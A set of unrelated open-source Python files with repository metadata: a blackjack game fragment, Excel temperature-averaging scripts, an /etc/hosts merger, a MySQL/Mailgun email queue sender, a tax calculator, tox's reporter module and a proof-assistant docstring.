shoedeckph, dealerdeckph, useddeckph =\
dealto(shoedeckph, dealerdeckph, useddeckph)
dealerhandvalueph = handvalue(dealerdeckph)
handstatement(dealerdeckph, 'The dealer\'s')
bet_resultph = bet_result(bet_valueph, playerdeckph, dealerdeckph)
useddeckph = useddeckph + playerdeckph + dealerdeckph
return bet_resultph, shoedeckph, useddeckph, quittrackerph
def dealto(shoedeckdt, deckdealtto, useddeckdt):
"""Deals a card from the shoe to the hand specified.
This also puts the cards from the used pile back into the shoe,
when the used deck is > 3 * shoe deck, because that's how
real casinos do it to reduce the effectiveness of card counting."""
if 3*len(shoedeckdt) < len(useddeckdt):
shoedeckdt.extend(useddeckdt)
random.shuffle(shoedeckdt)
del useddeckdt[:]
deckdealtto.append(shoedeckdt.pop())
return shoedeckdt, deckdealtto, useddeckdt
def handstatement(handtoprint, userflag='user'):
"""Prints what the hand consists of and the hand's value.
Future development: make it return proper English,
with Oxford commas."""
handstring = ''
for card in range(len(handtoprint)):
handstring = handstring + ' ' + handtoprint[card] + ','
handvaluestring = str(handvalue(handtoprint))
print(userflag + ' hand is ' + handstring + ' worth '+\
handvaluestring + '.')
def playerdecision_dialog(bet_valuepd, playerchipspd, playerstandpd,\
playerdeckpd, shoedeckph, useddeckpd,\
quittrackerpd, retries=6, decideflag = False):
"""Dialog in which the player decides their next action.
Then it implements the decision before returning to the loop in playhand.
Also sets conditions to eject the player from the game if they
insist on invalid responses."""
while (retries > 0) and (decideflag == False):
playeraction = input('Do you want to hit, stand, or double? ')
if playeraction in ('h', 'hi', 'ht', 'hit'):
shoedeckph, playerdeckpd, useddeckpd =\
dealto(shoedeckph, playerdeckpd, useddeckpd)
decideflag = True
elif playeraction in ('s', 'st', 'sta', 'stan', 'stand'):
playerstandpd = True
decideflag = True
elif playeraction in ('d', 'do', 'dou', 'doub', 'doubl', 'double' ):
if 2*bet_valuepd > playerchipspd:
print('I\'m sorry, you can\'t bet more chips than you have.')
retries = retries - 1
else:
bet_valuepd = 2*bet_valuepd
shoedeckph, playerdeckpd, useddeckpd =\
dealto(shoedeckph, playerdeckpd,\
useddeckpd)
playerstandpd = True
decideflag = True
#will need to add 'surrender' and 'split' here, if implemented
#elif playeraction in ('surren', 'surrender'):
# supposed to onlybe available on first decision of hand,
#and results in quit game -> complicated
# playerstandpd = True
# bet_valuepd = bet_valuepd - int(bet_valuepd/2)
# decideflag = True
#elif playeraction in ('sp', 'spl', 'spli', 'split'):
# supposed to only be available on first decision of hand,
#and results in two player hands -> complicated
#decideflag = True
else:
retries = retries - 1
print('I am sorry, I did not understand what you said.'\
' Could you repeat it, please?')
if retries <= 0:
quittrackerpd = True
print(failuretocomply)
bet_valuepd = 0
return bet_valuepd, playerstandpd, playerdeckpd,\
shoedeckph, useddeckpd, quittrackerpd
def handvalue(handlist): # to compute what a hand is worth
"""Computes what a hand is worth and returns it.
Makes use of the fact that no more than one ace will ever
be counted as an 11."""
handinteger = 0
ace_present = False
for card_in_hand in handlist:
if card_in_hand[:3] in list(card_value_dictionary.keys()):
handinteger = handinteger + card_value_dictionary[card_in_hand[:3]]
if card_in_hand[:3] == 'ace':
ace_present = True
#The player will never wish to count more than one ace as an 11
if (ace_present == True) and (handinteger + 10 <= 21):
handinteger = handinteger + 10
return handinteger
def bet_result(bet_valuebr, playerdeckbr, dealerdeckbr):
"""Calculates whether the bet is gained or lost by the player.
An initial block to set some local variables for convenience.
Then a bunch of conditions to determine whether the player or
dealer wins (so is the bet + or -).
Finally, modifies the bet if there is a blackjack for the player."""
playerblackjackbr = black_jack_check(playerdeckbr)
playerhandvaluebr = handvalue(playerdeckbr)
dealerblackjackbr = black_jack_check(dealerdeckbr)
dealerhandvaluebr = handvalue(dealerdeckbr)
if playerhandvaluebr > 21:
betmodifier = -1
elif dealerhandvaluebr > 21 and playerhandvaluebr <= 21:
betmodifier = 1
elif dealerhandvaluebr <= 21 and playerhandvaluebr <= 21:
if playerhandvaluebr > dealerhandvaluebr:
betmodifier = 1
elif playerhandvaluebr < dealerhandvaluebr:
betmodifier = -1
elif playerhandvaluebr == dealerhandvaluebr:
if (playerblackjackbr == True) and (dealerblackjackbr == False):
betmodifier = 1
elif (playerblackjackbr == False) and (dealerblackjackbr == True):
betmodifier = -1
else:
betmodifier = 0
if playerblackjackbr == True:
betmodifier = (3/2)*betmodifier
bet_resultbr = int(betmodifier * bet_valuebr)
return bet_resultbr
def black_jack_check(handtocheckbjc, isblackjack = False):
"""Returns a boolean on whether the hand is a blackjack.
Creates a list of ten and face cards, then checks that the
hand consists of one of these and an ace."""
tenfacelist = []
for cardvaluebjc in card_values[8:12]:
tenfacelist = tenfacelist + [cardvaluebjc[:3]]
if len(handtocheckbjc) == 2:
if (handtocheckbjc[0][:3] in ['ace']) and\
(handtocheckbjc[1][:3] in tenfacelist):
isblackjack = True
elif (handtocheckbjc[1][:3] in ['ace']) and\
(handtocheckbjc[0][:3] in tenfacelist):
isblackjack = True
return isblackjack
def bigdeckmaker(numberofdecksbdm, loopdeck=deckofcards):
"""Returns the giant deck that gets put in the shoe.
Uses the number chosen by the player and the already defined
deckofcards."""
makedeck = []
while numberofdecksbdm > 0:
makedeck.extend(loopdeck[:])
numberofdecksbdm = numberofdecksbdm -1
return makedeck
def get_number_from_player(maxchoicegnfp, maxstringgnfp, inputstringgnfp,\
minstringgnfp, quittrackergnfp, retries=6):
"""Dialog asking player to choose an integer.
Used for both making bets and picking the size of the shoe."""
while (retries > 0) :
playerchoice = input(inputstringgnfp)
if len(playerchoice) < 1:
playerchoice='user input error'
elif playerchoice[0] in [ str(range(10)[i]) for i in range(10)]:
playerchoice_int = int(playerchoice)
if (playerchoice_int <= maxchoicegnfp) and (playerchoice_int >0):
return playerchoice_int, quittrackergnfp
elif playerchoice_int < 1:
print(minstringgnfp+' Try again.')
else:
print(maxstringgnfp + str(maxchoicegnfp) + '. Try again.')
else:
print('Please enter an integer.')
retries = retries - 1
if retries <= 0:
print(failuretocomply)
quittrackergnfp = True
return 0, quittrackergnfp
def get_number_bet(playerchipsgnb, quittrackergnb):
"""A function to make calling get_number_from_player more convenient.
Returns the number of chips bet, and whether the player needs to be
ejected for bad answers."""
maxstringgnb = 'You may bet at most '
inputstringgnb = 'Please type how many chips would you like to bet: '
minstringgnb = 'You must bet at least one.'
bet_valuegnb, quittrackergnb =\
get_number_from_player(playerchipsgnb, maxstringgnb,\
inputstringgnb, minstringgnb,\
quittrackergnb)
return bet_valuegnb, quittrackergnb
def get_number_decks(quittrackergnd):
"""A function to make calling get_number_from_player more convenient.
Returns the number of decks, and whether the player needs to be ejected
for bad answers."""
maxstringgnd = 'You may choose at most '
inputstringgnd = 'Please choose how many decks your table is using: '
minstringgnd = 'You can\'t play with less than one deck of cards.'
numberofdecksgnd, quittrackergnd =\
get_number_from_player(8, maxstringgnd,\
inputstringgnd, minstringgnd,\
quittrackergnd)
return numberofdecksgnd, quittrackergnd
def quit_query(retries=4):
while (retries > 0):
ok = input('Do you want to keep playing, Yes or No? ')
if ok in ('y', 'ye', 'yes'):
return False
if ok in ('n', 'no', 'nop', 'nope'):
return True
retries = retries - 1
if retries < 0:
print(failuretocomply)
print('Yes or no, please!')
"""
Future developments (aka a bit of the sausage making):
Write a function to print failuretocomply, set quittracker,
and eject the player from the game.
Put the quittracker at the beginning of all functions, so that
get_number_decks can be improved by future implementation of
variable max number of decks.
Combine the betting and quitting dialog, which will require splitting off
from the shoesize dialog.
Turn this into a package with one or a few closely related functions in
each file, instead of this giant one.
"""
if __name__ == "__main__":
playgame()
| {
"repo_name": "BlueHat-GURU/python-blackjack",
"path": "blackjackfoura.py",
"copies": "1",
"size": "15763",
"license": "mit",
"hash": -6274417034087758000,
"line_mean": 33.1930585683,
"line_max": 79,
"alpha_frac": 0.6249444903,
"autogenerated": false,
"ratio": 3.9182202336564753,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5043164723956475,
"avg_score": null,
"num_lines": null
} |
# a program to prin the mothly averages
import numpy as np
from xlrd import open_workbook
import datetime
import sys
date_start_epoch=datetime.datetime(1899,12,30)
def compute_averages(file_name,cdate,c1,c2,c3):
# variables
#####################################
#file_name="TSB001.xlsx"
sheet_index=0
column_date_index=cdate
column_temp_1_index=c1
column_temp_2_index=c2
column_temp_3_index=c3
avg_file_name=file_name+".averages.txt"
#####################################
print ""
print "file name :",file_name
print "date column :",column_date_index
print "temperature column 1 :",column_temp_1_index
print "temperature column 2 :",column_temp_2_index
print "temperature column 3 :",column_temp_2_index
print "output file :",avg_file_name
print ""
# open the workbook
print "opening the file ",file_name
print ""
book=open_workbook(file_name)
print "Done. Now computing the averages..."
print ""
# open the sheet
sht=book.sheet_by_index(sheet_index)
# open the column
c_date=sht.col_values(column_date_index)
c_t_1=sht.col_values(column_temp_1_index)
c_t_2=sht.col_values(column_temp_2_index)
c_t_3=sht.col_values(column_temp_3_index)
month_check=0
month_list=[]
mean_t_list_1=[]
mean_t_list_2=[]
mean_t_list_3=[]
tot_t_1=[]
tot_t_2=[]
tot_t_3=[]
for i in range(len(c_date)):
try:
current_date = date_start_epoch + datetime.timedelta(days=int(c_date[i]))
# am I a new month this case will be satisfied in the first iteration
if current_date.month != month_check :
# if not the first time I should append the values
if month_check != 0 :
month_list.append(month_check)
mean_t_list_1.append(np.mean(tot_t_1))
mean_t_list_2.append(np.mean(tot_t_2))
mean_t_list_3.append(np.mean(tot_t_3))
tot_t_1=[]
tot_t_2=[]
tot_t_3=[]
if c_t_1[i] != 0 :
tot_t_1.append( float(c_t_1[i]) )
if c_t_2[i] != 0 :
tot_t_2.append( float(c_t_2[i]) )
if c_t_3[i] != 0 :
tot_t_3.append( float(c_t_3[i]) )
month_check = current_date.month
else:
if c_t_1[i] != 0 :
tot_t_1.append( float(c_t_1[i]) )
if c_t_2[i] != 0 :
tot_t_2.append( float(c_t_2[i]) )
if c_t_3[i] != 0 :
tot_t_3.append( float(c_t_3[i]) )
except(ValueError):
print "Skipping the value ",i,c_date[i]
# append the mean of the last month
month_list.append(month_check)
mean_t_list_1.append(np.mean(tot_t_1))
mean_t_list_2.append(np.mean(tot_t_2))
mean_t_list_3.append(np.mean(tot_t_3))
print ""
print "month","temp-1","temp-2","temp-3"
for i in range(len(month_list)):
print month_list[i],mean_t_list_1[i],mean_t_list_2[i],mean_t_list_3[i]
np.savetxt(avg_file_name,np.asarray([month_list,mean_t_list_1,mean_t_list_2,mean_t_list_3]).T,fmt='%5.3f',delimiter=",")
if __name__ == '__main__':
if len(sys.argv) == 6:
#dsfds
file_name=str(sys.argv[1])
cdate=int(sys.argv[2])
c1=int(sys.argv[3])
c2=int(sys.argv[4])
c3=int(sys.argv[5])
if c1<0 or c2<0 or c3<0 :
print "column numbers should be >= 0! try again..."
else:
compute_averages(file_name,cdate,c1,c2,c3)
else:
print "usage: python ",sys.argv[0], "<file_name>", "<date>" , "<temp-1>","<temp-2>","<temp-3>"
print "example: python",sys.argv[0], "TSB001.xlsx 0 1 7 11"
| {
"repo_name": "tbs1980/Retrofit",
"path": "source/monthly_average.py",
"copies": "1",
"size": "3287",
"license": "mpl-2.0",
"hash": -5589163391501690000,
"line_mean": 23.3481481481,
"line_max": 121,
"alpha_frac": 0.6206267113,
"autogenerated": false,
"ratio": 2.368155619596542,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3488782330896542,
"avg_score": null,
"num_lines": null
} |
# a program to prin the mothly averages
import numpy as np
from xlrd import open_workbook
import datetime
import sys
date_start_epoch=datetime.datetime(1899,12,30) #starting epoch of the date in excel
def get_threasholds(month,room):
winter = [10,11,12,1,2,3,4]
summer = [5,6,7,8,9]
thr_max = 22.
thr_min = 26.
if month in winter:
if room == "bedroom":
thr_max = 19.
thr_min = 17.
elif room == "livingroom":
thr_max = 23.
thr_min = 22.
else:
RuntimeError("Unknown room")
elif month in summer:
if room == "bedroom":
thr_max = 23.
thr_min = -100.
elif room == "livingroom":
thr_max = 25.
thr_min = -100.
else:
RuntimeError("Unknown room")
else:
RuntimeError("Unknown month")
return thr_max,thr_min
def compute_averages(file_name,cdate,c1,room):
"""
Compute the monthly average, min, max of columns c1 given the date column
cdate.
@param file_name name of the input file
@param cdata column corresponding to the date
@param c1 column number corresponding to the 1st data
"""
# variables
#####################################
#file_name="TSB001.xlsx"
sheet_index=0
column_date_index=cdate
column_temp_1_index=c1
avg_file_name = file_name+".stats_"+str(c1)+"_"+room+".txt"
#####################################
print ""
print "file name :",file_name
print "date column :",column_date_index
print "temperature column :",column_temp_1_index
print "room :",room
print "output file :",avg_file_name
print ""
#return
# open the workbook
print "opening the file ",file_name
print ""
book=open_workbook(file_name)
print "Done. Now computing the averages..."
print ""
# open the sheet
sht=book.sheet_by_index(sheet_index)
# open the column
c_date=sht.col_values(column_date_index)
c_t=sht.col_values(column_temp_1_index)
month_check=0
month_list=[]
mean_t_list=[]
min_t_list = []
max_t_list = []
thr_min_list = []
thr_max_list = []
greater_than_max = []
less_than_min = []
tot_t=[]
for i in range(len(c_date)):
try:
#find the current month
current_date = date_start_epoch + datetime.timedelta(days=int(c_date[i]))
# am I a new month this case will be satisfied in the first iteration
if current_date.month != month_check :
# if not the first time I should append the values
if month_check != 0 :
#print "month ",month_check
month_list.append(month_check)
if len(tot_t) >0 :
mean_t_list.append(np.mean(tot_t))
min_t_list.append(np.min(tot_t))
max_t_list.append(np.max(tot_t))
thr_max,thr_min=get_threasholds(month_check,room)
tot_t_npy = np.asarray(tot_t)
thr_min_list.append(thr_min)
thr_max_list.append(thr_max)
greater_than_max.append(100.*len(np.where(tot_t_npy>thr_max)[0])/float(len(tot_t)))
less_than_min.append(100*len(np.where(tot_t_npy<thr_min)[0])/float(len(tot_t)))
else :
mean_t_list.append(-1e90)
min_t_list.append(-1e90)
max_t_list.append(-1e90)
thr_max,thr_min=get_threasholds(month_check,room)
thr_max_list.append(thr_max)
thr_min_list.append(thr_min)
greater_than_max.append(-1e90)
less_than_min.append(-1e90)
tot_t=[]
#if value is not FALSE add it to the list
if c_t[i] != 0 :
tot_t.append( float(c_t[i]) )
month_check = current_date.month
else: # if i am not a new month, keep appending the list
if c_t[i] != 0 :
tot_t.append( float(c_t[i]) )
except(ValueError):
print "Skipping the value ",i,c_date[i]
#pass
# append the mean of the last month
month_list.append(month_check)
if len(tot_t) >0 :
mean_t_list.append(np.mean(tot_t))
min_t_list.append(np.min(tot_t))
max_t_list.append(np.max(tot_t))
thr_max,thr_min=get_threasholds(month_check,room)
tot_t_npy = np.asarray(tot_t)
thr_min_list.append(thr_min)
thr_max_list.append(thr_max)
greater_than_max.append(100.*len(np.where(tot_t_npy>thr_max)[0])/float(len(tot_t)))
less_than_min.append(100*len(np.where(tot_t_npy<thr_min)[0])/float(len(tot_t)))
else :
mean_t_list.append(-1e90)
min_t_list.append(-1e90)
max_t_list.append(-1e90)
thr_max,thr_min=get_threasholds(month_check,room)
thr_max_list.append(thr_max)
thr_min_list.append(thr_min)
greater_than_max.append(-1e90)
less_than_min.append(-1e90)
# print the averages
print ""
print "month","mean","min","max","thr-min","thr-max","less-than-min%","greater-than-max%"
for i in range(len(month_list)):
print month_list[i],mean_t_list[i],min_t_list[i],max_t_list[i],thr_min_list[i],thr_max_list[i],less_than_min[i],greater_than_max[i]
# write the averaes to a file
np.savetxt(avg_file_name,np.asarray([month_list,mean_t_list,min_t_list,max_t_list,thr_min_list,thr_max_list,less_than_min,greater_than_max]).T,fmt='%5.3f',delimiter=",")
if __name__ == '__main__':
if len(sys.argv) == 5:
file_name=str(sys.argv[1])
cdate=int(sys.argv[2])
c1=int(sys.argv[3])
room = str(sys.argv[4])
rooms = ["bedroom","livingroom"]
if c1>0 and (room in rooms):
#print "computing"
compute_averages(file_name,cdate,c1,room)
else:
print "input problematic"
print "note that"
print "column of temperature should be > 0!"
print "room should be in : ",rooms
else:
print "usage: python ",sys.argv[0], "<file_name>", "<date>" , "<temp>" ,"<bedroom/livingroom>"
print "example: python",sys.argv[0], "TSB001.xlsx 0 1 bedroom"
| {
"repo_name": "tbs1980/Retrofit",
"path": "source/comparison_to_cibse.py",
"copies": "1",
"size": "5772",
"license": "mpl-2.0",
"hash": -3090377895400213500,
"line_mean": 28.6,
"line_max": 171,
"alpha_frac": 0.6055093555,
"autogenerated": false,
"ratio": 2.888888888888889,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39943982443888887,
"avg_score": null,
"num_lines": null
} |
"""A program to update /etc/hosts from our defintions"""
from __future__ import print_function
import os
import sys
def parse_line(line):
parts = line.split()
ip, names = parts[0], parts[1:]
return ip, names
def format_line(ip, names):
if names is None:
return str(ip)
names = sorted(list(names))
return '%-16s\t%s' % (ip, ' '.join(names))
def read_host_lines(path_to_hosts):
lines = []
for line in file(path_to_hosts, 'r'):
line = line.rstrip()
if not line or line[0] == '#':
parsed = (line, None)
else:
parts = line.split()
parsed = parts[0], set(parts[1:])
lines.append(parsed)
return lines
def path_to_etc_hosts():
return '/etc/hosts'
def path_to_jab_hosts():
jab = '~/jab'
return os.path.join(jab, 'etc/hosts')
def read_etc_hosts():
return read_host_lines(path_to_etc_hosts())
def read_my_hosts():
return read_host_lines(path_to_jab_hosts())
def _has_names(line):
_ip, names = line
return names is not None
def ip_dict(lines):
return dict([l for l in lines if _has_names(l)])
def merge_hosts(etc_hosts, my_hosts):
extras = ip_dict(my_hosts)
result = []
added_line = '# Added by %s' % os.path.basename(sys.argv[0])
has_added_line = False
for line in etc_hosts:
ip, names = line
new_line = format_line(ip, names)
if new_line == added_line:
has_added_line = True
else:
if has_added_line and not new_line:
has_added_line = False
if _has_names(line) and ip in extras:
extra_names = extras[ip]
if names.difference(extra_names):
new_line = format_line(ip, names.union(extra_names))
del extras[ip]
result.append(new_line)
extra_lines = []
for ip, names in extras.items():
extra_lines.append(format_line(ip, names))
if extra_lines and not has_added_line:
extra_lines.insert(0, '#')
extra_lines.insert(1, '# Added by %s' % sys.argv[0])
result.extend(extra_lines)
return result
def write_hosts(lines, path_to_hosts):
"""Write the given lines to the given hosts file
If that is not possible (usually permission denied for /etc/hosts)
then just write to stdout
"""
try:
output = file(path_to_hosts, 'w')
for line in lines:
print(line, file=output)
output.close()
return os.EX_OK
except IOError:
print('\n'.join(lines))
return os.EX_NOPERM
def main():
etc_hosts = read_etc_hosts()
my_hosts = read_my_hosts()
lines = merge_hosts(etc_hosts, my_hosts)
return write_hosts(lines, path_to_etc_hosts())
if __name__ == '__main__':
sys.exit(main())
| {
"repo_name": "jalanb/jab",
"path": "src/python/update_hosts.py",
"copies": "2",
"size": "2813",
"license": "mit",
"hash": 95230832230858140,
"line_mean": 24.1160714286,
"line_max": 70,
"alpha_frac": 0.5801635265,
"autogenerated": false,
"ratio": 3.3289940828402367,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4909157609340236,
"avg_score": null,
"num_lines": null
} |
"""A program used for sending emails through Automation."""
# standard library
import argparse
import base64
import json
# third party
import mysql.connector
import requests
# first party
import delphi.operations.secrets as secrets
#Functions to encode and decode messages
def encode(x):
return 'b64|%s'%(base64.b64encode(json.dumps(x).encode('utf-8')).decode("utf-8"))
def decode(x):
return json.loads(base64.b64decode(x[4:].encode('utf-8')).decode("utf-8"))
#Connect to the database as the automation user
def _connect():
u, p = secrets.db.auto
return mysql.connector.connect(user=u, password=p, database='automation')
#Add an email to the database queue
def queue_email(to, subject, text, cc=None, bcc=None, html=None, attachments=None, priority=1):
#Build the body data string
data = {'text': text}
if cc is not None:
data['cc'] = cc
if bcc is not None:
data['bcc'] = bcc
if html is not None:
data['html'] = html
if attachments is not None:
data['attachments'] = attachments
body = encode(data)
if len(body) >= 16384:
raise Exception('Encoded email overflows database field (max=16383|len=%d)'%(len(body)))
#Connect, queue, commit, and disconnect
cnx = _connect()
cur = cnx.cursor()
cur.execute("INSERT INTO email_queue (`from`, `to`, `subject`, `body`, `priority`, `timestamp`) VALUES ('%s','%s','%s','%s',%f,UNIX_TIMESTAMP(NOW()))"%(secrets.flucontest.email_epicast, to, subject, body, priority))
cnx.commit()
cur.close()
cnx.close()
#Add an email to the database queue
def call_emailer():
#Connect, call, and disconnect
cnx = _connect()
cur = cnx.cursor()
cur.execute("CALL RunStep(2)")
cnx.commit()
cur.close()
cnx.close()
#Function to send email with the mailgun API
def _send_email(frm, to, subject, body):
auth = ('api', secrets.mailgun.key)
files = None
data = {
'from': frm,
'to': to,
'subject': subject,
}
#The body is either plain text or a base64 encoded JSON string
if body[:4] == 'b64|':
x = decode(body)
if 'text' not in x:
raise Exception('Field \'text\' is missing')
data['text'] = x['text']
if 'html' in x:
data['html'] = x['html']
if 'cc' in x:
data['cc'] = x['cc']
if 'bcc' in x:
data['bcc'] = x['bcc']
if 'attachments' in x:
files = []
for attachment in x['attachments']:
#Each attachment is (file_name, mime_type)
if type(attachment[0]) in (list, tuple):
attachment = attachment[0]
files.append(('attachment', (attachment[0], open(attachment[0], 'rb'), attachment[1])))
else:
data['text'] = body
try:
print('Sending email: %s -> %s "%s"'%(frm, to, subject))
r = requests.post('https://api.mailgun.net/v2/epicast.net/messages', auth=auth, data=data, files=files)
return (r.status_code == 200) and (r.json()['message'] == 'Queued. Thank you.')
except Exception:
return False
if __name__ == '__main__':
#Args and usage
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action='store_const', const=True, default=False, help="show extra output")
parser.add_argument('-t', '--test', action='store_const', const=True, default=False, help="test run only, don't send emails or update the database")
parser.add_argument('--limit', type=int, default=100, help="maximum number of emails to send (default 100)")
args = parser.parse_args()
#DB connection
if args.verbose: print('Connecting to the database')
cnx = _connect()
select = cnx.cursor()
update = cnx.cursor()
if args.verbose: print('Connected successfully')
#Get the list of emails
select.execute('SELECT `id`, `from`, `to`, `subject`, `body` FROM `email_queue` WHERE `status` = 0 ORDER BY `priority` DESC LIMIT %d' % args.limit)
emails = []
for (email_id, email_from, email_to, email_subject, email_body) in select:
emails.append({
"id": email_id,
"from": email_from,
"to": email_to,
"subject": email_subject,
"body": email_body,
})
if args.verbose: print('Found %d email(s)'%(len(emails)))
#Send emails
for email in emails:
if args.verbose: print(' [%s] %s -> %s "%s" (%d)'%(email['id'], email['from'], email['to'], email['subject'], len(email['body'])))
if args.test: continue
#Sending in progress
update.execute('UPDATE email_queue SET `status` = 2, `timestamp` = UNIX_TIMESTAMP(NOW()) WHERE `id` = %s'%(email['id']))
cnx.commit()
#Send
success = _send_email(email['from'], email['to'], email['subject'], email['body'])
#Success or failure
if success:
if args.verbose: print(' Success')
update.execute('UPDATE email_queue SET `status` = 1, `timestamp` = UNIX_TIMESTAMP(NOW()) WHERE `id` = %s'%(email['id']))
else:
if args.verbose: print(' Failure')
update.execute('UPDATE email_queue SET `status` = 3, `timestamp` = UNIX_TIMESTAMP(NOW()) WHERE `id` = %s'%(email['id']))
cnx.commit()
#Cleanup
cnx.commit()
select.close()
update.close()
cnx.close()
| {
"repo_name": "cmu-delphi/operations",
"path": "src/emailer.py",
"copies": "1",
"size": "5035",
"license": "mit",
"hash": -1152282444913702900,
"line_mean": 33.2517006803,
"line_max": 217,
"alpha_frac": 0.6365441907,
"autogenerated": false,
"ratio": 3.330026455026455,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4466570645726455,
"avg_score": null,
"num_lines": null
} |
# A program written to calculate the income tax
# of individual who make a current amount of money
# during the year
# Written by Adrian Anderson Programmer, 9/11/17
tax_dic = {0 : 0, 0.1 : 30000.01, 0.2 : 50000, 0.3 : 100000, 0.35 : 200000, 0.4 : 250000}
tax_rate = [0, 0.1, 0.2, 0.3, 0.35, 0.4]
income_gap = [0, 30000.01, 50000, 100000, 200000, 250000]
counter = 5
income = round(float(input('What is your total income for the year? $')), 2)
while(counter > 0):
if(income > income_gap[counter]):
temp = tax_rate[counter] * (income - income_gap[counter])
income = income - temp
print('You are taxed at', tax_rate[counter], '%', 'your deduction is $', round(temp, 2))
break
else:
counter -= 1
while(counter > 0):
temp = tax_rate[counter - 1] * (income - income_gap[counter -1])
income = income - temp
print('You are taxed at', tax_rate[counter], '%', 'your deduction is $', round(temp, 2))
counter -= 1
print('Your amount after tax is $' + str(round(income, 2)))
tax_dic = {0 : 0, 0.1 : 30000.01, 0.2 : 50000, 0.3 : 100000, 0.35 : 200000, 0.4 : 250000}
| {
"repo_name": "biggapoww/Python-CIS-5",
"path": "tax_calculator.py",
"copies": "1",
"size": "1124",
"license": "mit",
"hash": 6229057931187547000,
"line_mean": 35.2580645161,
"line_max": 96,
"alpha_frac": 0.6138790036,
"autogenerated": false,
"ratio": 2.802992518703242,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8886047284286902,
"avg_score": 0.006164847603267821,
"num_lines": 31
} |
"""A progress reporter inspired from the logging modules"""
from __future__ import absolute_import, unicode_literals
import os
import time
from contextlib import contextmanager
from datetime import datetime
import py
class Verbosity(object):
DEBUG = 2
INFO = 1
DEFAULT = 0
QUIET = -1
EXTRA_QUIET = -2
REPORTER_TIMESTAMP_ON_ENV = str("TOX_REPORTER_TIMESTAMP")
REPORTER_TIMESTAMP_ON = os.environ.get(REPORTER_TIMESTAMP_ON_ENV, False) == "1"
START = datetime.now()
class Reporter(object):
def __init__(self, verbose_level=None, quiet_level=None):
kwargs = {}
if verbose_level is not None:
kwargs["verbose_level"] = verbose_level
if quiet_level is not None:
kwargs["quiet_level"] = quiet_level
self._reset(**kwargs)
def _reset(self, verbose_level=0, quiet_level=0):
self.verbose_level = verbose_level
self.quiet_level = quiet_level
self.reported_lines = []
self.tw = py.io.TerminalWriter()
@property
def verbosity(self):
return self.verbose_level - self.quiet_level
def log_popen(self, cwd, outpath, cmd_args_shell, pid):
"""log information about the action.popen() created process."""
msg = "[{}] {}$ {}".format(pid, cwd, cmd_args_shell)
if outpath:
if outpath.common(cwd) is not None:
outpath = cwd.bestrelpath(outpath)
msg = "{} >{}".format(msg, outpath)
self.verbosity1(msg, of="logpopen")
@property
def messages(self):
return [i for _, i in self.reported_lines]
@contextmanager
def timed_operation(self, name, msg):
self.verbosity2("{} start: {}".format(name, msg), bold=True)
start = time.time()
yield
duration = time.time() - start
self.verbosity2(
"{} finish: {} after {:.2f} seconds".format(name, msg, duration),
bold=True,
)
def separator(self, of, msg, level):
if self.verbosity >= level:
self.reported_lines.append(("separator", "- summary -"))
self.tw.sep(of, msg)
def logline_if(self, level, of, msg, key=None, **kwargs):
if self.verbosity >= level:
message = str(msg) if key is None else "{}{}".format(key, msg)
self.logline(of, message, **kwargs)
def logline(self, of, msg, **opts):
self.reported_lines.append((of, msg))
timestamp = ""
if REPORTER_TIMESTAMP_ON:
timestamp = "{} ".format(datetime.now() - START)
line_msg = "{}{}\n".format(timestamp, msg)
self.tw.write(line_msg, **opts)
def keyvalue(self, name, value):
if name.endswith(":"):
name += " "
self.tw.write(name, bold=True)
self.tw.write(value)
self.tw.line()
def line(self, msg, **opts):
self.logline("line", msg, **opts)
def info(self, msg):
self.logline_if(Verbosity.DEBUG, "info", msg)
def using(self, msg):
self.logline_if(Verbosity.INFO, "using", msg, "using ", bold=True)
def good(self, msg):
self.logline_if(Verbosity.QUIET, "good", msg, green=True)
def warning(self, msg):
self.logline_if(Verbosity.QUIET, "warning", msg, "WARNING: ", red=True)
def error(self, msg):
self.logline_if(Verbosity.QUIET, "error", msg, "ERROR: ", red=True)
def skip(self, msg):
self.logline_if(Verbosity.QUIET, "skip", msg, "SKIPPED: ", yellow=True)
def verbosity0(self, msg, **opts):
self.logline_if(Verbosity.DEFAULT, "verbosity0", msg, **opts)
def verbosity1(self, msg, of="verbosity1", **opts):
self.logline_if(Verbosity.INFO, of, msg, **opts)
def verbosity2(self, msg, **opts):
self.logline_if(Verbosity.DEBUG, "verbosity2", msg, **opts)
def quiet(self, msg):
self.logline_if(Verbosity.QUIET, "quiet", msg)
_INSTANCE = Reporter()
def update_default_reporter(quiet_level, verbose_level):
_INSTANCE.quiet_level = quiet_level
_INSTANCE.verbose_level = verbose_level
def has_level(of):
return _INSTANCE.verbosity > of
def verbosity():
return _INSTANCE.verbosity
verbosity0 = _INSTANCE.verbosity0
verbosity1 = _INSTANCE.verbosity1
verbosity2 = _INSTANCE.verbosity2
error = _INSTANCE.error
warning = _INSTANCE.warning
good = _INSTANCE.good
using = _INSTANCE.using
skip = _INSTANCE.skip
info = _INSTANCE.info
line = _INSTANCE.line
separator = _INSTANCE.separator
keyvalue = _INSTANCE.keyvalue
quiet = _INSTANCE.quiet
timed_operation = _INSTANCE.timed_operation
log_popen = _INSTANCE.log_popen
| {
"repo_name": "tox-dev/tox",
"path": "src/tox/reporter.py",
"copies": "2",
"size": "4617",
"license": "mit",
"hash": 3633896165006017500,
"line_mean": 28.4076433121,
"line_max": 79,
"alpha_frac": 0.6170673598,
"autogenerated": false,
"ratio": 3.4871601208459215,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 157
} |
"""A proof assistant, or interactive theorem prover. This implements the
sequent calculus, including maintaining proof state such as context (the set
of symbols to the left of the turnstile) and goals.
Actually, I think the sequent calculus is implemented in MatchAndSubstitute's
try_rule(), along with some rules. Hmm. For example, "forall P, Q, P & Q -> P"
could be a rule, although that's a second order logic rule I think.
So in Hilbert-style deductive systems, it is common to have only modus ponens
and universal generalization as rules of inference, however, you then have
axiom schemas that encompass the rest of propositional logic. Coq has
tactics like "split" for conjunction goals, and "left" and "right" for
disjunction goals.
Basic deduction functions used by most / all search techniques.
This file contains basic stuff that should be independent of any
particular search technique.
"""
from Expression import Expression, CompositeExpression
import MatchAndSubstitute
